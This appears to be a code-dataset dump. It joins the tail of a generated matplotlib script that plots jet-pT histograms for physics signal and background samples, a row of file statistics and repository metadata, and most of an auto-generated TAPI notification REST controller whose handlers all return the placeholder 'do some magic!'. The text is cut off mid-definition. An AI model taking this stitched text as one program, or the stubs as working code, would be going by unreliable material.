.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_19 y1_PT_19_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000113599034018,5.67830673105e-05,0.000113737731341,0.000170367485976,0.000141884881145,0.000481802982601,0.000621862920074,0.000511166622891,0.000284079239418,0.000620465549742,0.000312218843897,0.000482608757904,0.000534552078816,0.000567898105729,0.000537094021404,0.000622539474269,0.000426019418286,0.000763286065978,0.000991075402277,0.000566370623108,0.000738178553119,0.000651580804438,0.000819445262688,0.000568163528857,0.000710387845633,0.000482653465437,0.000625761684302,0.000880939063231,0.000539583087308,0.000652760875366,0.000509589085657,0.000711199413607,0.000537738493117,0.000766169924648,0.000735821233333,0.000567344831443,0.000537023024059,0.000397452790028,0.000454063517968,0.000398671181699,0.000453985688243,0.00050873191897,0.000624292276915,0.000255779965179,0.000454444200384,0.000511375604615,0.000480740101851,0.000397267573106,0.00019904209555,0.000369045088882,0.000454098125461,0.000395649338649,0.000397488140171,0.000312183939345,0.000369384628484,0.000340048763306,0.000283905013717,0.000398740693743,0.000311979116461,0.000368800757015,0.000340553171219,0.000226727792319,0.000283567107944,0.000510731132902,0.000312611111653,0.000311463568797,0.000312540411368,0.000509680580143,0.000397491704891,0.000422167441011,0.00034071551452,0.000368923442804,0.000454020295736,0.000455800279373,0.000567545346956,0.000312241123399,0.000596324967247,0.000367731638005,0.000424484212104,0.000481536668293,0.000312289989772,0.000311889255805,0.000196529264844,0.000424352763046,0.000227314485858,0.000255551526023,0.000395912682357,0.000283760939607,0.000254231242766,0.000311615366467,0.000369366507823,0.000226934546093,0.000170234551617,0.00014177532541,0.000112250025057,0.000113650544226,0.00014194796184,0.000225730561833,0.000255443396176,0.000226977174206,8.35984079281e-05,8.48569472602e-05,2.83770742588e-05,5.68149418506e-05,2.84575181121e-05,0.000141639643246,0.00019843282545,8.53120877693e-05,8.43218381939e-05,8.51811288596e-05,8.48250727201e-05,2.83584485955e-05,2.83770742588e-05,2.84059930517e-05,2.81710185762e-05,8.51708357299e-05,5.69150362242e-05,5.68635111638e-05,5.68226951171e-05]) # Creating a new Canvas fig = plt.figure(figsize=(12,6),dpi=80) frame = gridspec.GridSpec(1,1,right=0.7) pad = fig.add_subplot(frame[0]) # Creating a new Stack pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights+y1_PT_19_weights,\ label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights,\ label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights,\ label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights,\ label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights,\ label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights,\ label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights,\ label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights,\ label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights,\ label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights,\ label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights,\ label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights,\ label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights,\ label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights,\ label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights,\ label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#758991", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights,\ label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#688296", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights,\ label="$signal\_2pt4TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#6d7a84", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights,\ label="$signal\_2pt2TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#7c99d1", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights,\ label="$signal\_2TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#7f7f9b", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights,\ label="$signal\_1pt8TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#aaa5bf", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") # Axis plt.rc('text',usetex=False) plt.xlabel(r"p_{T} [ j_{1} ] ( GeV ) ",\ fontsize=16,color="black") plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 40.0\ \mathrm{fb}^{-1})$ ",\ fontsize=16,color="black") # Boundary of y-axis ymax=(y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights+y1_PT_19_weights).max()*1.1 ymin=0 # linear scale #ymin=min([x for x in (y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights+y1_PT_19_weights) if x])/100. # log scale plt.gca().set_ylim(ymin,ymax) # Log/Linear scale for X-axis plt.gca().set_xscale("linear") #plt.gca().set_xscale("log",nonposx="clip") # Log/Linear scale for Y-axis plt.gca().set_yscale("linear") #plt.gca().set_yscale("log",nonposy="clip") # Legend plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.) # Saving the image plt.savefig('../../HTML/MadAnalysis5job_0/selection_0.png') plt.savefig('../../PDF/MadAnalysis5job_0/selection_0.png') plt.savefig('../../DVI/MadAnalysis5job_0/selection_0.eps') # Running! if __name__ == '__main__': selection_0()
228
3,169
0.758329
10,600
49,704
3.467264
0.166981
0.261094
0.387152
0.510326
0.369956
0.342095
0.338421
0.323402
0.316872
0.314995
0
0.606738
0.037945
49,704
217
3,170
229.050691
0.161864
0.029072
0
0.171875
0
0.007813
0.024492
0.004148
0
0
0
0
0
1
0.007813
false
0
0.03125
0
0.039063
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f9e4102660ff658ab7db455635825948c308bfcd
31,443
py
Python
RI/flask_server/tapi_server/controllers/tapi_notification_controller.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
57
2018-04-09T08:56:18.000Z
2022-03-23T08:31:06.000Z
RI/flask_server/tapi_server/controllers/tapi_notification_controller.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
143
2016-06-08T04:09:54.000Z
2018-02-23T10:45:59.000Z
RI/flask_server/tapi_server/controllers/tapi_notification_controller.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
64
2018-03-07T07:55:17.000Z
2022-03-28T07:14:28.000Z
import connexion import six from tapi_server.models.inline_object19 import InlineObject19 # noqa: E501 from tapi_server.models.inline_object2 import InlineObject2 # noqa: E501 from tapi_server.models.inline_object20 import InlineObject20 # noqa: E501 from tapi_server.models.inline_object28 import InlineObject28 # noqa: E501 from tapi_server.models.inline_object7 import InlineObject7 # noqa: E501 from tapi_server.models.tapi_common_name_and_value import TapiCommonNameAndValue # noqa: E501 from tapi_server.models.tapi_notification_alarm_info import TapiNotificationAlarmInfo # noqa: E501 from tapi_server.models.tapi_notification_create_notification_subscription_service import TapiNotificationCreateNotificationSubscriptionService # noqa: E501 from tapi_server.models.tapi_notification_delete_notification_subscription_service import TapiNotificationDeleteNotificationSubscriptionService # noqa: E501 from tapi_server.models.tapi_notification_get_notification_list import TapiNotificationGetNotificationList # noqa: E501 from tapi_server.models.tapi_notification_get_notification_subscription_service_details import TapiNotificationGetNotificationSubscriptionServiceDetails # noqa: E501 from tapi_server.models.tapi_notification_get_notification_subscription_service_list import TapiNotificationGetNotificationSubscriptionServiceList # noqa: E501 from tapi_server.models.tapi_notification_get_supported_notification_types import TapiNotificationGetSupportedNotificationTypes # noqa: E501 from tapi_server.models.tapi_notification_name_and_value_change import TapiNotificationNameAndValueChange # noqa: E501 from tapi_server.models.tapi_notification_notification import TapiNotificationNotification # noqa: E501 from tapi_server.models.tapi_notification_notification_channel import TapiNotificationNotificationChannel # noqa: E501 from tapi_server.models.tapi_notification_notification_context import TapiNotificationNotificationContext # noqa: E501 from tapi_server.models.tapi_notification_notification_subscription_service import TapiNotificationNotificationSubscriptionService # noqa: E501 from tapi_server.models.tapi_notification_subscription_filter import TapiNotificationSubscriptionFilter # noqa: E501 from tapi_server.models.tapi_notification_tca_info import TapiNotificationTcaInfo # noqa: E501 from tapi_server.models.tapi_notification_update_notification_subscription_service import TapiNotificationUpdateNotificationSubscriptionService # noqa: E501 from tapi_server import util def data_context_notification_context_delete(): # noqa: E501 """data_context_notification_context_delete removes tapi.notification.NotificationContext # noqa: E501 :rtype: None """ return 'do some magic!' def data_context_notification_context_get(): # noqa: E501 """data_context_notification_context_get returns tapi.notification.NotificationContext # noqa: E501 :rtype: TapiNotificationNotificationContext """ return 'do some magic!' def data_context_notification_context_notif_subscription_post(tapi_notification_notification_subscription_service=None): # noqa: E501 """data_context_notification_context_notif_subscription_post creates tapi.notification.NotificationSubscriptionService # noqa: E501 :param tapi_notification_notification_subscription_service: tapi.notification.NotificationSubscriptionService to be added to list :type tapi_notification_notification_subscription_service: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_subscription_service = TapiNotificationNotificationSubscriptionService.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_delete(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_delete removes tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_get(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_get returns tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: TapiNotificationNotificationSubscriptionService """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_delete(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_delete removes tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_put creates or updates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_delete(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_delete removes tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_get(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_get returns tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: TapiNotificationNotificationChannel """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_delete(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_delete removes tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_put creates or updates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_post(uuid, tapi_notification_notification_channel=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_post creates tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_channel: tapi.notification.NotificationChannel to be added to list :type tapi_notification_notification_channel: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_channel = TapiNotificationNotificationChannel.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_put(uuid, tapi_notification_notification_channel=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_put creates or updates tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_channel: tapi.notification.NotificationChannel to be added or updated :type tapi_notification_notification_channel: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_channel = TapiNotificationNotificationChannel.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_additional_infovalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_additional_infovalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of additional-info :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_alarm_info_get(uuid, notification_uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_alarm_info_get returns tapi.notification.AlarmInfo # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :rtype: TapiNotificationAlarmInfo """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_changed_attributesvalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_changed_attributesvalue_name_get returns tapi.notification.NameAndValueChange # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of changed-attributes :type value_name: str :rtype: TapiNotificationNameAndValueChange """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_get(uuid, notification_uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_get returns tapi.notification.Notification # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :rtype: TapiNotificationNotification """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_namevalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_target_object_namevalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_target_object_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of target-object-name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_tca_info_get(uuid, notification_uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_tca_info_get returns tapi.notification.TcaInfo # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :rtype: TapiNotificationTcaInfo """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_post(uuid, tapi_notification_notification_subscription_service=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_post creates tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_subscription_service: tapi.notification.NotificationSubscriptionService to be added to list :type tapi_notification_notification_subscription_service: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_subscription_service = TapiNotificationNotificationSubscriptionService.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_put(uuid, tapi_notification_notification_subscription_service=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_put creates or updates tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_subscription_service: tapi.notification.NotificationSubscriptionService to be added or updated :type tapi_notification_notification_subscription_service: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_subscription_service = TapiNotificationNotificationSubscriptionService.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_delete(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_delete removes tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_get(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_get returns tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: TapiNotificationSubscriptionFilter """ return 'do some magic!' def 